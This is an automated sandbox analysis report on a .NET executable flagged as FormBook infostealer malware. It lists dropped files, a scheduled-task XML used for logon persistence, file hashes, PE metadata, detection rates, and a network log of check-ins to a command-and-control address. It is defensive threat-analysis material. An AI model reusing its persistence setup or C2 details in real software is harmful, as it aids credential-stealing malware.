                                               • 103.180.120.145
                                               AARNET-AS-APAustralianAcademicandResearchNetworkAARNe | 95DVgihS4k.elf | malicious | Unknown
                                               • 161.50.87.189
                                              No context
                                              No context
                                              Process:C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):1216
                                              Entropy (8bit):5.34331486778365
                                              Encrypted:false
                                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                              Malicious:false
                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                              Process:C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):1216
                                              Entropy (8bit):5.34331486778365
                                              Encrypted:false
                                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                              Malicious:true
                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:modified
                                              Size (bytes):2232
                                              Entropy (8bit):5.380192968514367
                                              Encrypted:false
                                              SSDEEP:48:+WSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMugeC/ZPUyus:+LHyIFKL3IZ2KRH9Oug8s
                                              MD5:E3EC01FAB7E327602A9550342FA73464
                                              SHA1:7F06C78BA2496A8DDB3DDCD63BAF741CB8C84886
                                              SHA-256:4ECCD285FCD821659092ADB47638B559656F97512183BA76AEE2760D531273C5
                                              SHA-512:B66B707510DE1B0AA29F65F1C99BDEEBDC4D34EC3D9950B62E17058D2E5B1599C85A09EC056F1C4BCE019213485F1E3D7E9D68651890A853819F98DBF2492407
                                              Malicious:false
                                              Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                              Process:C:\Windows\SysWOW64\reg.exe
                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                              Category:dropped
                                              Size (bytes):114688
                                              Entropy (8bit):0.9746603542602881
                                              Encrypted:false
                                              SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                              MD5:780853CDDEAEE8DE70F28A4B255A600B
                                              SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                              SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                              SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                              Malicious:false
                                              Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe
                                              File Type:XML 1.0 document, ASCII text
                                              Category:dropped
                                              Size (bytes):1580
                                              Entropy (8bit):5.12232738037069
                                              Encrypted:false
                                              SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaNoxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTzv
                                              MD5:529B0B1CD17CAB2A54AB8848035CA804
                                              SHA1:EA034189827C60F6E806E83C7A5F76436945EEB1
                                              SHA-256:F97047DC69F35E0F7B87AB05A3F7796626173D2E129C189622E6F7A848DAF1F6
                                              SHA-512:67E0B4962192654D278F09FA89E098B5AB598ECF2528DFDE541687B772F934D6F0BB7C95A8AEA98B429D7574C9DC873647FFCF19F270CE6B9B2ADD2FAB5FBC56
                                              Malicious:true
                                              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                              Process:C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe
                                              File Type:XML 1.0 document, ASCII text
                                              Category:dropped
                                              Size (bytes):1580
                                              Entropy (8bit):5.12232738037069
                                              Encrypted:false
                                              SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaNoxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTzv
                                              MD5:529B0B1CD17CAB2A54AB8848035CA804
                                              SHA1:EA034189827C60F6E806E83C7A5F76436945EEB1
                                              SHA-256:F97047DC69F35E0F7B87AB05A3F7796626173D2E129C189622E6F7A848DAF1F6
                                              SHA-512:67E0B4962192654D278F09FA89E098B5AB598ECF2528DFDE541687B772F934D6F0BB7C95A8AEA98B429D7574C9DC873647FFCF19F270CE6B9B2ADD2FAB5FBC56
                                              Malicious:false
                                              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                              Process:C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):744448
                                              Entropy (8bit):7.909409154134137
                                              Encrypted:false
                                              SSDEEP:12288:UlTSDzsi9gxS6GxNqPMryBhXVU5esCmYY7nlVIOehCD6W0M+HnwDNPy66x1cngCh:UlTSDD9D6Gh+Bs8sCYnlWOsCr+Y4x1t0
                                              MD5:5CB7ACEF6FCB2F9FEED94483F364030A
                                              SHA1:68470B83C29C96C569ED5DB44668FE6286C1230C
                                              SHA-256:C6AF34274BA09E990BDBC008C74F95F935BA6D256ED23EE8C67EA06530C8C0EA
                                              SHA-512:938CE6946F21D9D266E10D2A80B5B3E107CADBC18183DD1326A107A5E34D18BF2E8FF272279D2FFF38A3C6A73BC60F02F3E06E26B22CACAE38AD16775C35947F
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 34%
                                               • Antivirus: Virustotal, Detection: 32%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...o.................0..R..........jq... ........@.. ....................................@..................................q..O...................................HF..p............................................ ............... ..H............text...pQ... ...R.................. ..`.rsrc................T..............@..@.reloc...............Z..............@..B................Kq......H...........j...........(..P...........................................^..}.....(.......(.....*.0..+.........,..{.......+....,...{....o........(.....*...s....}......(...... ... ....s....(......r...po.....*^..}.....(.......(.....*..0..>........r...p.s.....(.....+...{....o.....rC..po....o....&..o......-.*...0...........rW..p.s.....(......{....o ...o!....+~..r...po....o"...s#.....o$....rC..po....o"...o%...&.o$....r...po....o"...o%...&.o$....r...po....o"...o%...&.{....o ....o&.
                                              Process:C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):26
                                              Entropy (8bit):3.95006375643621
                                              Encrypted:false
                                              SSDEEP:3:ggPYV:rPYV
                                              MD5:187F488E27DB4AF347237FE461A079AD
                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                              Malicious:true
                                              Preview:[ZoneTransfer]....ZoneId=0
                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Entropy (8bit):7.909409154134137
                                              TrID:
                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                              • Win32 Executable (generic) a (10002005/4) 49.78%
                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                              • DOS Executable Generic (2002/1) 0.01%
                                              File name:jlsvOH1c8bSRKqM.exe
                                              File size:744'448 bytes
                                              MD5:5cb7acef6fcb2f9feed94483f364030a
                                              SHA1:68470b83c29c96c569ed5db44668fe6286c1230c
                                              SHA256:c6af34274ba09e990bdbc008c74f95f935ba6d256ed23ee8c67ea06530c8c0ea
                                              SHA512:938ce6946f21d9d266e10d2a80b5b3e107cadbc18183dd1326a107a5e34d18bf2e8ff272279d2fff38a3c6a73bc60f02f3e06e26b22cacae38ad16775c35947f
                                              SSDEEP:12288:UlTSDzsi9gxS6GxNqPMryBhXVU5esCmYY7nlVIOehCD6W0M+HnwDNPy66x1cngCh:UlTSDD9D6Gh+Bs8sCYnlWOsCr+Y4x1t0
                                              TLSH:51F4129073FD2B06C9FD97F648A4128947BA610F75B5E39D2CC3A1DB04A2F401AA1F5B
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...o.................0..R..........jq... ........@.. ....................................@................................
                                              Icon Hash:90cececece8e8eb0
                                              Entrypoint:0x4b716a
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                              Time Stamp:0xB0A7146F [Sat Dec 1 13:02:39 2063 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                              Instruction
                                              jmp dword ptr [00402000h]
                                               Name                                  Virtual Address  Virtual Size  Is in Section
                                               IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                                               IMAGE_DIRECTORY_ENTRY_IMPORT          0xb7117          0x4f          .text
                                               IMAGE_DIRECTORY_ENTRY_RESOURCE        0xb8000          0x5cc         .rsrc
                                               IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                                               IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                                               IMAGE_DIRECTORY_ENTRY_BASERELOC       0xba000          0xc           .reloc
                                               IMAGE_DIRECTORY_ENTRY_DEBUG           0xb4648          0x70          .text
                                               IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                               IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                               IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                                               IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                                               IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                               IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
                                               IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                                               IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
                                               IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
                                               Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity     File Type  Entropy              Characteristics
                                               .text   0x2000           0xb5170       0xb5200   becfbd48cf234d57200a9c25367a855e  False     0.9303142792443064  data       7.9159393452530775   IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                               .rsrc   0xb8000          0x5cc         0x600     f5864a393e3e99f4e157bc2c6ca742eb  False     0.4270833333333333  data       4.1277406997876955   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                               .reloc  0xba000          0xc           0x200     47484824d77df065490608b486027e8b  False     0.044921875         data       0.10191042566270775  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                               Name         RVA      Size   Type                                                                              Language  Country  ZLIB Complexity
                                               RT_VERSION   0xb8090  0x33c  data                                                                                                  0.42632850241545894
                                               RT_MANIFEST  0xb83dc  0x1ea  XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators                     0.5489795918367347
                                               DLL          Import
                                               mscoree.dll  _CorExeMain
                                               Timestamp                 Protocol  SID      Message                                      Source Port  Dest Port  Source IP    Dest IP
                                               07/08/24-09:33:28.821901  TCP       2855465  ETPRO TROJAN FormBook CnC Checkin (GET) M2  49741        80         192.168.2.4  3.33.130.190
                                              Jul 8, 2024 09:34:03.046217918 CEST80497493.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:03.046292067 CEST80497493.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:03.046302080 CEST80497493.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:03.046309948 CEST80497493.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:03.046463013 CEST80497493.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:03.046471119 CEST80497493.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:03.046478987 CEST80497493.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:04.456258059 CEST80497493.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:04.456497908 CEST4974980192.168.2.43.33.130.190
                                              Jul 8, 2024 09:34:04.546000004 CEST4974980192.168.2.43.33.130.190
                                              Jul 8, 2024 09:34:04.551048040 CEST80497493.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:05.564834118 CEST4975080192.168.2.43.33.130.190
                                              Jul 8, 2024 09:34:05.569979906 CEST80497503.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:05.570096016 CEST4975080192.168.2.43.33.130.190
                                              Jul 8, 2024 09:34:05.572886944 CEST4975080192.168.2.43.33.130.190
                                              Jul 8, 2024 09:34:05.577817917 CEST80497503.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:13.033412933 CEST80497503.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:13.033469915 CEST80497503.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:13.033842087 CEST4975080192.168.2.43.33.130.190
                                              Jul 8, 2024 09:34:13.036526918 CEST4975080192.168.2.43.33.130.190
                                              Jul 8, 2024 09:34:13.042742968 CEST80497503.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:18.238712072 CEST4975180192.168.2.43.33.130.190
                                              Jul 8, 2024 09:34:18.245183945 CEST80497513.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:18.245302916 CEST4975180192.168.2.43.33.130.190
                                              Jul 8, 2024 09:34:18.247215033 CEST4975180192.168.2.43.33.130.190
                                              Jul 8, 2024 09:34:18.252165079 CEST80497513.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:18.709741116 CEST80497513.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:18.710063934 CEST4975180192.168.2.43.33.130.190
                                              Jul 8, 2024 09:34:19.749042988 CEST4975180192.168.2.43.33.130.190
                                              Jul 8, 2024 09:34:19.753885031 CEST80497513.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:20.768003941 CEST4975280192.168.2.43.33.130.190
                                              Jul 8, 2024 09:34:20.772919893 CEST80497523.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:20.773010969 CEST4975280192.168.2.43.33.130.190
                                              Jul 8, 2024 09:34:20.774857044 CEST4975280192.168.2.43.33.130.190
                                              Jul 8, 2024 09:34:20.779666901 CEST80497523.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:22.354640007 CEST4975280192.168.2.43.33.130.190
                                              Jul 8, 2024 09:34:22.360168934 CEST80497523.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:22.360225916 CEST4975280192.168.2.43.33.130.190
                                              Jul 8, 2024 09:34:23.361689091 CEST4975380192.168.2.43.33.130.190
                                              Jul 8, 2024 09:34:23.366638899 CEST80497533.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:23.368724108 CEST4975380192.168.2.43.33.130.190
                                              Jul 8, 2024 09:34:23.371140003 CEST4975380192.168.2.43.33.130.190
                                              Jul 8, 2024 09:34:23.375931025 CEST80497533.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:23.375993967 CEST80497533.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:23.376003981 CEST80497533.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:23.376055956 CEST80497533.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:23.376121044 CEST80497533.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:23.376149893 CEST80497533.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:23.376159906 CEST80497533.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:23.376241922 CEST80497533.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:23.376251936 CEST80497533.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:23.834151030 CEST80497533.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:23.834206104 CEST4975380192.168.2.43.33.130.190
                                              Jul 8, 2024 09:34:24.874037027 CEST4975380192.168.2.43.33.130.190
                                              Jul 8, 2024 09:34:24.878917933 CEST80497533.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:25.894172907 CEST4975480192.168.2.43.33.130.190
                                              Jul 8, 2024 09:34:25.899195910 CEST80497543.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:25.899286032 CEST4975480192.168.2.43.33.130.190
                                              Jul 8, 2024 09:34:25.901145935 CEST4975480192.168.2.43.33.130.190
                                              Jul 8, 2024 09:34:25.905926943 CEST80497543.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:26.493890047 CEST80497543.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:26.494110107 CEST80497543.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:26.494245052 CEST4975480192.168.2.43.33.130.190
                                              Jul 8, 2024 09:34:26.498549938 CEST4975480192.168.2.43.33.130.190
                                              Jul 8, 2024 09:34:26.503328085 CEST80497543.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:31.519742966 CEST4975580192.168.2.43.33.130.190
                                              Jul 8, 2024 09:34:31.524648905 CEST80497553.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:31.524718046 CEST4975580192.168.2.43.33.130.190
                                              Jul 8, 2024 09:34:31.526988983 CEST4975580192.168.2.43.33.130.190
                                              Jul 8, 2024 09:34:31.531758070 CEST80497553.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:32.006599903 CEST80497553.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:32.006666899 CEST4975580192.168.2.43.33.130.190
                                              Jul 8, 2024 09:34:33.032547951 CEST4975580192.168.2.43.33.130.190
                                              Jul 8, 2024 09:34:33.037626028 CEST80497553.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:34.055675030 CEST4975680192.168.2.43.33.130.190
                                              Jul 8, 2024 09:34:34.060662985 CEST80497563.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:34.060733080 CEST4975680192.168.2.43.33.130.190
                                              Jul 8, 2024 09:34:34.062695026 CEST4975680192.168.2.43.33.130.190
                                              Jul 8, 2024 09:34:34.067518950 CEST80497563.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:34.531335115 CEST80497563.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:34.534635067 CEST4975680192.168.2.43.33.130.190
                                              Jul 8, 2024 09:34:35.577169895 CEST4975680192.168.2.43.33.130.190
                                              Jul 8, 2024 09:34:35.582031965 CEST80497563.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:36.598546982 CEST4975780192.168.2.43.33.130.190
                                              Jul 8, 2024 09:34:36.603423119 CEST80497573.33.130.190192.168.2.4
                                              Jul 8, 2024 09:34:36.603544950 CEST4975780192.168.2.43.33.130.190
                                              Jul 8, 2024 09:34:36.606571913 CEST4975780192.168.2.43.33.130.190
                                              Jul 8, 2024 09:34:36.611390114 CEST80497573.33.130.190192.168.2.4
